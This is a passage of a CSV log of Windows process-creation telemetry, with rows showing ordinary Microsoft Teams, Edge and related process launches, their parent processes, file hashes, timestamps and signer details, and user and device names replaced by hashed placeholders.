Explorer,Microsoft Corporation,Microsoft OneDrive,21.099.0516.0003,Client Application,OneDrive.exe,Microsoft OneDrive
+501,False,Medium,S-1-12-1-3476864874-1154527411-4288707492-1560701320,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,TokenElevationTypeLimited,NotWeb,2021-06-24 00:52:35.937594200+00:00,10608,Update.exe,"""Update.exe"" --processStart ""Teams.exe"" --process-start-args ""--system-initiated""",PortableExecutable,2020-11-11 01:26:36.505424500+00:00,C:\Users\UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01\AppData\Local\Microsoft\Teams\Update.exe,2454184,958472658892e02affb3c43d2a7ad030,76c4854a36d8cf22fb14f2f61d00013820a1b7431f9a896a0b29af8a8748e842,934d0f53972cb7896f39019b5f79d835cc413f26,4bf8cf1a2379b0054860ec220ca329b9,63f8608b5eb6ba2d37fffaf46f86363faf15684a367c1603ceb06f0693c877ba,e94fc38810c097a64f7419960f2d21052d1cb2e7,S-1-12-1-3476864874-1154527411-4288707492-1560701320,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,2021-06-24 00:52:13.094577200+00:00,18420,explorer.exe,Explorer.EXE,False,2021-06-24 00:52:12.833640100+00:00,13428,\Device\HarddiskVolume3\Windows\System32\userinit.exe,Medium,TokenElevationTypeLimited,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-24 00:52:36.038174800+00:00,2021-06-24 00:53:50.928795200+00:00,cd89f412-7b19-4751-ab6e-1a7e8f73f9dd,computerpii_0a470890c60768167990033d701e7bd881398861,168284,False,10.7740.19041.1052,False,11540474045175127,,11540474045175215,2021-06-24 00:52:13.094577200+00:00,18420,2021-06-24 00:52:13.094577200+00:00,\Device\HarddiskVolume3\Windows\explorer.exe,18420,128,ActiveProcessStartkey,C:\Windows,4891752,2074-04-27 14:38:40+00:00,2021-06-09 01:20:37.481306100+00:00,2021-06-24 00:52:13.096789600+00:00,2021-06-09 01:20:37.358875500+00:00,128,NoTruncation,0,,10.0,False,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,433423938,433423938,False,1.0,20481.0,1.0,1.0,,,,,,,Valid,OsVendor,Valid,OsVendor,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.1023,explorer,EXPLORER.EXE,Windows Explorer,Microsoft Corporation,Microsoft Teams,1.10.63.0,Update.exe,Update.exe,Microsoft Teams
+502,False,Low,S-1-12-1-3476864874-1154527411-4288707492-1560701320,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,TokenElevationTypeLimited,NotWeb,2021-06-24 00:52:36.683459500+00:00,12056,msedge.exe,"""msedge.exe"" --type=utility --utility-sub-type=audio.mojom.AudioService --field-trial-handle=2084,2987170515631334499,3695594818534080064,131072 --lang=en-US --service-sandbox-type=audio --mojo-platform-channel-handle=6968 /prefetch:8",PortableExecutable,2021-05-21 00:32:35.112476600+00:00,C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe,3278224,e28229223228fde1f3bb465926566414,a1cb5c84d7387fa4da415c9af0db5f5534575f045f71b7afee0922fc0352d73f,c0c6f4240a04db99aae6f7c5312b7308c44945b1,e28229223228fde1f3bb465926566414,a1cb5c84d7387fa4da415c9af0db5f5534575f045f71b7afee0922fc0352d73f,c0c6f4240a04db99aae6f7c5312b7308c44945b1,S-1-12-1-3476864874-1154527411-4288707492-1560701320,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,2021-06-24 00:52:20.669190100+00:00,15088,msedge.exe,"""msedge.exe"" --profile-directory=Default",False,2021-06-24 00:52:13.094577200+00:00,18420,\Device\HarddiskVolume3\Windows\explorer.exe,Medium,TokenElevationTypeLimited,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-24 00:52:36.727188300+00:00,2021-06-24 00:53:50.929518500+00:00,5f9be71f-ed30-4a0f-b920-5ed1c5efd44c,computerpii_0a470890c60768167990033d701e7bd881398861,168298,False,10.7740.19041.1052,False,11540474045175158,,11540474045175216,2021-06-24 00:52:20.669190100+00:00,15088,2021-06-24 00:52:20.669190100+00:00,\Device\HarddiskVolume3\Program Files (x86)\Microsoft\Edge\Application\msedge.exe,15088,128,ActiveProcessStartkey,C:\Program Files (x86)\Microsoft\Edge\Application,3278224,2021-06-17 16:58:31+00:00,2021-06-18 05:12:00.071479900+00:00,2021-06-23 01:16:40.091697100+00:00,2021-05-21 00:32:35.112476600+00:00,128,NoTruncation,0,,10.0,False,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,433423938,433423938,False,1.0,3073.0,,384.0,,,,,,,Valid,OsVendorApplication,Valid,OsVendorApplication,Microsoft Corporation,Microsoft Edge,91.0.864.54,msedge_exe,msedge.exe,Microsoft Edge,Microsoft Corporation,Microsoft Edge,91.0.864.54,msedge_exe,msedge.exe,Microsoft Edge
+503,False,Medium,S-1-12-1-3476864874-1154527411-4288707492-1560701320,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,TokenElevationTypeLimited,NotWeb,2021-06-24 00:52:36.690400400+00:00,14440,msedge.exe,"""msedge.exe"" --type=utility --utility-sub-type=video_capture.mojom.VideoCaptureService --field-trial-handle=2084,2987170515631334499,3695594818534080064,131072 --lang=en-US --service-sandbox-type=video_capture --mojo-platform-channel-handle=7124 /prefetch:8",PortableExecutable,2021-05-21 00:32:35.112476600+00:00,C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe,3278224,e28229223228fde1f3bb465926566414,a1cb5c84d7387fa4da415c9af0db5f5534575f045f71b7afee0922fc0352d73f,c0c6f4240a04db99aae6f7c5312b7308c44945b1,e28229223228fde1f3bb465926566414,a1cb5c84d7387fa4da415c9af0db5f5534575f045f71b7afee0922fc0352d73f,c0c6f4240a04db99aae6f7c5312b7308c44945b1,S-1-12-1-3476864874-1154527411-4288707492-1560701320,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,2021-06-24 00:52:20.669190100+00:00,15088,msedge.exe,"""msedge.exe"" --profile-directory=Default",False,2021-06-24 00:52:13.094577200+00:00,18420,\Device\HarddiskVolume3\Windows\explorer.exe,Medium,TokenElevationTypeLimited,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-24 00:52:36.727628300+00:00,2021-06-24 00:53:50.929570300+00:00,41cc84ce-e817-4d6b-916c-6a451d059488,computerpii_0a470890c60768167990033d701e7bd881398861,168299,False,10.7740.19041.1052,False,11540474045175158,,11540474045175217,2021-06-24 00:52:20.669190100+00:00,15088,2021-06-24 00:52:20.669190100+00:00,\Device\HarddiskVolume3\Program Files (x86)\Microsoft\Edge\Application\msedge.exe,15088,128,ActiveProcessStartkey,C:\Program Files (x86)\Microsoft\Edge\Application,3278224,2021-06-17 16:58:31+00:00,2021-06-18 05:12:00.071479900+00:00,2021-06-23 01:16:40.091697100+00:00,2021-05-21 00:32:35.112476600+00:00,128,NoTruncation,0,,10.0,False,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,433423938,433423938,False,1.0,3073.0,1.0,1.0,,,,,,,Valid,OsVendorApplication,Valid,OsVendorApplication,Microsoft Corporation,Microsoft Edge,91.0.864.54,msedge_exe,msedge.exe,Microsoft Edge,Microsoft Corporation,Microsoft Edge,91.0.864.54,msedge_exe,msedge.exe,Microsoft Edge
+504,False,Low,S-1-12-1-3476864874-1154527411-4288707492-1560701320,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,TokenElevationTypeLimited,NotWeb,2021-06-24 00:52:37.419827+00:00,15216,msedge.exe,"""msedge.exe"" --type=renderer --field-trial-handle=2084,2987170515631334499,3695594818534080064,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1.25 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=15 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6808 /prefetch:1",PortableExecutable,2021-05-21 00:32:35.112476600+00:00,C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe,3278224,e28229223228fde1f3bb465926566414,a1cb5c84d7387fa4da415c9af0db5f5534575f045f71b7afee0922fc0352d73f,c0c6f4240a04db99aae6f7c5312b7308c44945b1,e28229223228fde1f3bb465926566414,a1cb5c84d7387fa4da415c9af0db5f5534575f045f71b7afee0922fc0352d73f,c0c6f4240a04db99aae6f7c5312b7308c44945b1,S-1-12-1-3476864874-1154527411-4288707492-1560701320,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,2021-06-24 00:52:20.669190100+00:00,15088,msedge.exe,"""msedge.exe"" --profile-directory=Default",False,2021-06-24 00:52:13.094577200+00:00,18420,\Device\HarddiskVolume3\Windows\explorer.exe,Medium,TokenElevationTypeLimited,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-24 00:52:37.434911700+00:00,2021-06-24 00:53:50.930096800+00:00,be57d7e7-2d9b-49ba-80ce-4c8e83aa6c2d,computerpii_0a470890c60768167990033d701e7bd881398861,168310,False,10.7740.19041.1052,False,11540474045175158,,11540474045175218,2021-06-24 00:52:20.669190100+00:00,15088,2021-06-24 00:52:20.669190100+00:00,\Device\HarddiskVolume3\Program Files (x86)\Microsoft\Edge\Application\msedge.exe,15088,128,ActiveProcessStartkey,C:\Program Files (x86)\Microsoft\Edge\Application,3278224,2021-06-17 16:58:31+00:00,2021-06-18 05:12:00.071479900+00:00,2021-06-23 01:16:40.091697100+00:00,2021-05-21 00:32:35.112476600+00:00,128,NoTruncation,0,,10.0,False,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,433423938,433423938,False,1.0,3073.0,,384.0,,,,,,,Valid,OsVendorApplication,Valid,OsVendorApplication,Microsoft Corporation,Microsoft Edge,91.0.864.54,msedge_exe,msedge.exe,Microsoft Edge,Microsoft Corporation,Microsoft Edge,91.0.864.54,msedge_exe,msedge.exe,Microsoft Edge
+505,False,Medium,S-1-12-1-3476864874-1154527411-4288707492-1560701320,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,TokenElevationTypeLimited,NotWeb,2021-06-24 00:52:38.077847800+00:00,3760,Teams.exe,"""Teams.exe"" --system-initiated",PortableExecutable,2021-05-18 01:04:27.365665+00:00,C:\Users\UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01\AppData\Local\Microsoft\Teams\current\Teams.exe,104860976,23f71890129a077d846a3fcd41bf9d55,b18426f62797d6101be8fef1c1f69ce4383f40360f04974cfa196b68fe74687e,dd08a0f120a870170a8170542985fda2087391b1,958472658892e02affb3c43d2a7ad030,76c4854a36d8cf22fb14f2f61d00013820a1b7431f9a896a0b29af8a8748e842,934d0f53972cb7896f39019b5f79d835cc413f26,S-1-12-1-3476864874-1154527411-4288707492-1560701320,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,2021-06-24 00:52:35.937594200+00:00,10608,Update.exe,"""Update.exe"" --processStart ""Teams.exe"" --process-start-args ""--system-initiated""",False,2021-06-24 00:52:13.094577200+00:00,18420,\Device\HarddiskVolume3\Windows\explorer.exe,Medium,TokenElevationTypeLimited,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-24 00:52:38.105253600+00:00,2021-06-24 00:53:50.930353500+00:00,33079094-3fb5-4db8-9705-a9e80c83180c,computerpii_0a470890c60768167990033d701e7bd881398861,168315,False,10.7740.19041.1052,False,11540474045175215,,11540474045175219,2021-06-24 00:52:35.937594200+00:00,10608,2021-06-24 00:52:35.937594200+00:00,\Device\HarddiskVolume3\Users\UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01\AppData\Local\Microsoft\Teams\Update.exe,10608,128,ActiveProcessStartkey,C:\Users\UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01\AppData\Local\Microsoft\Teams,2454184,2021-02-19 03:38:00+00:00,2021-05-18 01:04:27.365665+00:00,2021-06-24 00:52:36.019755200+00:00,2020-11-11 01:26:36.505424500+00:00,128,NoTruncation,0,,10.0,False,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,433423938,433423938,False,1.0,1.0,1.0,1.0,,,,,,,Valid,OsVendor,Valid,OsVendor,Microsoft Corporation,Microsoft Teams,1.10.63.0,Update.exe,Update.exe,Microsoft Teams,Microsoft Corporation,Microsoft Teams,1.4.00.11161,Teams,Teams.exe,Microsoft Teams
+506,False,Low,S-1-12-1-3476864874-1154527411-4288707492-1560701320,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,TokenElevationTypeLimited,NotWeb,2021-06-24 00:52:38.241643800+00:00,13464,msedge.exe,"""msedge.exe"" --type=utility --utility-sub-type=password_manager.breach_detection.mojom.EdgePasswordDataProcessor --field-trial-handle=2084,2987170515631334499,3695594818534080064,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=6680 /prefetch:8",PortableExecutable,2021-05-21 00:32:35.112476600+00:00,C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe,3278224,e28229223228fde1f3bb465926566414,a1cb5c84d7387fa4da415c9af0db5f5534575f045f71b7afee0922fc0352d73f,c0c6f4240a04db99aae6f7c5312b7308c44945b1,e28229223228fde1f3bb465926566414,a1cb5c84d7387fa4da415c9af0db5f5534575f045f71b7afee0922fc0352d73f,c0c6f4240a04db99aae6f7c5312b7308c44945b1,S-1-12-1-3476864874-1154527411-4288707492-1560701320,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,2021-06-24 00:52:20.669190100+00:00,15088,msedge.exe,"""msedge.exe"" --profile-directory=Default",False,2021-06-24 00:52:13.094577200+00:00,18420,\Device\HarddiskVolume3\Windows\explorer.exe,Medium,TokenElevationTypeLimited,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-24 00:52:38.284091800+00:00,2021-06-24 00:53:50.930509700+00:00,a5930c24-f932-4ae2-bfd0-ed19dbb6b092,computerpii_0a470890c60768167990033d701e7bd881398861,168318,False,10.7740.19041.1052,False,11540474045175158,,11540474045175220,2021-06-24 00:52:20.669190100+00:00,15088,2021-06-24 00:52:20.669190100+00:00,\Device\HarddiskVolume3\Program Files (x86)\Microsoft\Edge\Application\msedge.exe,15088,128,ActiveProcessStartkey,C:\Program Files (x86)\Microsoft\Edge\Application,3278224,2021-06-17 16:58:31+00:00,2021-06-18 05:12:00.071479900+00:00,2021-06-23 01:16:40.091697100+00:00,2021-05-21 00:32:35.112476600+00:00,128,NoTruncation,0,,10.0,False,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,433423938,433423938,False,1.0,3073.0,,384.0,,,,,,,Valid,OsVendorApplication,Valid,OsVendorApplication,Microsoft Corporation,Microsoft Edge,91.0.864.54,msedge_exe,msedge.exe,Microsoft Edge,Microsoft Corporation,Microsoft Edge,91.0.864.54,msedge_exe,msedge.exe,Microsoft Edge
+507,False,Low,S-1-12-1-3476864874-1154527411-4288707492-1560701320,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,TokenElevationTypeLimited,NotWeb,2021-06-24 00:52:39.163799800+00:00,21340,Teams.exe,"""Teams.exe"" --type=gpu-process --field-trial-handle=1784,798869040387949835,14039564101966597118,131072 --enable-features=WebComponentsV0Enabled --disable-features=PictureInPicture,SpareRendererForSitePerProcess --electron-shared-settings=eyJ********** --gpu-preferences=KAAAAAAAAADgAAAwAAAAAAAAYAAAAAAAEAAAAAAAAAAAAAAAAAAAACgAAAAEAAAAIAAAAAAAAAAoAAAAAAAAADAAAAAAAAAAOAAAAAAAAAAQAAAAAAAAAAAAAAAFAAAAEAAAAAAAAAAAAAAABgAAABAAAAAAAAAAAQAAAAUAAAAQAAAAAAAAAAEAAAAGAAAA --mojo-platform-channel-handle=1796 --ignored="" --type=renderer "" /prefetch:2",PortableExecutable,2021-05-18 01:04:27.365665+00:00,C:\Users\UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01\AppData\Local\Microsoft\Teams\current\Teams.exe,104860976,23f71890129a077d846a3fcd41bf9d55,b18426f62797d6101be8fef1c1f69ce4383f40360f04974cfa196b68fe74687e,dd08a0f120a870170a8170542985fda2087391b1,23f71890129a077d846a3fcd41bf9d55,b18426f62797d6101be8fef1c1f69ce4383f40360f04974cfa196b68fe74687e,dd08a0f120a870170a8170542985fda2087391b1,S-1-12-1-3476864874-1154527411-4288707492-1560701320,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,2021-06-24 00:52:38.077847800+00:00,3760,Teams.exe,"""Teams.exe"" --system-initiated",False,2021-06-24 00:52:35.937594200+00:00,10608,\Device\HarddiskVolume3\Users\UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01\AppData\Local\Microsoft\Teams\Update.exe,Medium,TokenElevationTypeLimited,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-24 00:52:39.214943700+00:00,2021-06-24 00:53:50.930715500+00:00,5513747d-4e32-4291-b421-c225fb218a40,computerpii_0a470890c60768167990033d701e7bd881398861,168322,False,10.7740.19041.1052,False,11540474045175219,,11540474045175221,2021-06-24 00:52:38.077847800+00:00,3760,2021-06-24 00:52:38.077847800+00:00,\Device\HarddiskVolume3\Users\UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01\AppData\Local\Microsoft\Teams\current\Teams.exe,3760,128,ActiveProcessStartkey,C:\Users\UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01\AppData\Local\Microsoft\Teams\current,104860976,2020-04-01 22:51:26+00:00,2021-05-18 01:04:31.750843800+00:00,2021-06-24 00:52:38.087365500+00:00,2021-05-18 01:04:27.365665+00:00,128,NoTruncation,0,,10.0,False,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,433423938,433423938,False,1.0,1.0,,384.0,,,,,,,Valid,OsVendor,Valid,OsVendor,Microsoft Corporation,Microsoft Teams,1.4.00.11161,Teams,Teams.exe,Microsoft Teams,Microsoft Corporation,Microsoft Teams,1.4.00.11161,Teams,Teams.exe,Microsoft Teams
+508,False,Medium,S-1-12-1-3476864874-1154527411-4288707492-1560701320,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,TokenElevationTypeLimited,NotWeb,2021-06-24 00:52:39.264703200+00:00,12900,Teams.exe,"""Teams.exe"" --type=utility --field-trial-handle=1784,798869040387949835,14039564101966597118,131072 --enable-features=WebComponentsV0Enabled --disable-features=PictureInPicture,SpareRendererForSitePerProcess --lang=en-US --service-sandbox-type=network --enable-wer --ms-teams-less-cors=522133263 --electron-shared-settings=eyJ********** --mojo-platform-channel-handle=2272 /prefetch:8",PortableExecutable,2021-05-18 01:04:27.365665+00:00,C:\Users\UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01\AppData\Local\Microsoft\Teams\current\Teams.exe,104860976,23f71890129a077d846a3fcd41bf9d55,b18426f62797d6101be8fef1c1f69ce4383f40360f04974cfa196b68fe74687e,dd08a0f120a870170a8170542985fda2087391b1,23f71890129a077d846a3fcd41bf9d55,b18426f62797d6101be8fef1c1f69ce4383f40360f04974cfa196b68fe74687e,dd08a0f120a870170a8170542985fda2087391b1,S-1-12-1-3476864874-1154527411-4288707492-1560701320,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,2021-06-24 00:52:38.077847800+00:00,3760,Teams.exe,"""Teams.exe"" --system-initiated",False,2021-06-24 00:52:35.937594200+00:00,10608,\Device\HarddiskVolume3\Users\UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01\AppData\Local\Microsoft\Teams\Update.exe,Medium,TokenElevationTypeLimited,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-24 00:52:39.309051400+00:00,2021-06-24 00:53:50.930767300+00:00,5b6ee1bb-96ff-4746-99f1-3a76bfe6a69a,computerpii_0a470890c60768167990033d701e7bd881398861,168323,False,10.7740.19041.1052,False,11540474045175219,,11540474045175222,2021-06-24 00:52:38.077847800+00:00,3760,2021-06-24 00:52:38.077847800+00:00,\Device\HarddiskVolume3\Users\UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01\AppData\Local\Microsoft\Teams\current\Teams.exe,3760,128,ActiveProcessStartkey,C:\Users\UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01\AppData\Local\Microsoft\Teams\current,104860976,2020-04-01 22:51:26+00:00,2021-05-18 01:04:31.750843800+00:00,2021-06-24 00:52:38.087365500+00:00,2021-05-18 01:04:27.365665+00:00,128,NoTruncation,0,,10.0,False,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,433423938,433423938,False,1.0,1.0,1.0,1.0,,,,,,,Valid,OsVendor,Valid,OsVendor,Microsoft Corporation,Microsoft Teams,1.4.00.11161,Teams,Teams.exe,Microsoft Teams,Microsoft Corporation,Microsoft Teams,1.4.00.11161,Teams,Teams.exe,Microsoft Teams
+509,False,Low,S-1-12-1-3476864874-1154527411-4288707492-1560701320,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,TokenElevationTypeLimited,NotWeb,2021-06-24 00:52:39.383023700+00:00,7776,Teams.exe,"""Teams.exe"" --type=renderer --autoplay-policy=no-user-gesture-required --disable-background-timer-throttling --field-trial-handle=1784,798869040387949835,14039564101966597118,131072 --enable-features=WebComponentsV0Enabled --disable-features=PictureInPicture,SpareRendererForSitePerProcess --lang=en-US --enable-wer --ms-teams-less-cors=522133263 --app-user-model-id=com.squirrel.Teams.Teams --app-path=""C:\Users\UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01\AppData\Local\Microsoft\Teams\current\resources\app.asar"" --enable-sandbox --native-window-open --preload=""C:\Users\UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01\AppData\Local\Microsoft\Teams\current\resources\app.asar\lib\renderer\FilePII_b3dffdae7daffa46d23ed7197baff899565e8592.js"" --background-color=#fff --enable-websql --electron-shared-settings=eyJ********** --device-scale-factor=1.25 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2552 /prefetch:1 --msteams-process-type=loadingWindow",PortableExecutable,2021-05-18 01:04:27.365665+00:00,C:\Users\UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01\AppData\Local\Microsoft\Teams\current\Teams.exe,104860976,23f71890129a077d846a3fcd41bf9d55,b18426f62797d6101be8fef1c1f69ce4383f40360f04974cfa196b68fe74687e,dd08a0f120a870170a8170542985fda2087391b1,23f71890129a077d846a3fcd41bf9d55,b18426f62797d6101be8fef1c1f69ce4383f40360f04974cfa196b68fe74687e,dd08a0f120a870170a8170542985fda2087391b1,S-1-12-1-3476864874-1154527411-4288707492-1560701320,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,2021-06-24 00:52:38.077847800+00:00,3760,Teams.exe,"""Teams.exe"" --system-initiated",False,2021-06-24 00:52:35.937594200+00:00,10608,\Device\HarddiskVolume3\Users\UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01\AppData\Local\Microsoft\Teams\Update.exe,Medium,TokenElevationTypeLimited,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-24 00:52:39.417167800+00:00,2021-06-24 00:53:50.930820600+00:00,d23f3af4-1fd3-4396-9830-21ed2ef2b5a5,computerpii_0a470890c60768167990033d701e7bd881398861,168324,False,10.7740.19041.1052,False,11540474045175219,,11540474045175223,2021-06-24 00:52:38.077847800+00:00,3760,2021-06-24 00:52:38.077847800+00:00,\Device\HarddiskVolume3\Users\UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01\AppData\Local\Microsoft\Teams\current\Teams.exe,3760,128,ActiveProcessStartkey,C:\Users\UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01\AppData\Local\Microsoft\Teams\current,104860976,2020-04-01 22:51:26+00:00,2021-05-18 01:04:31.750843800+00:00,2021-06-24 00:52:38.087365500+00:00,2021-05-18 01:04:27.365665+00:00,128,NoTruncation,0,,10.0,False,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,433423938,433423938,False,1.0,1.0,,384.0,,,,,,,Valid,OsVendor,Valid,OsVendor,Microsoft Corporation,Microsoft Teams,1.4.00.11161,Teams,Teams.exe,Microsoft Teams,Microsoft Corporation,Microsoft Teams,1.4.00.11161,Teams,Teams.exe,Microsoft Teams
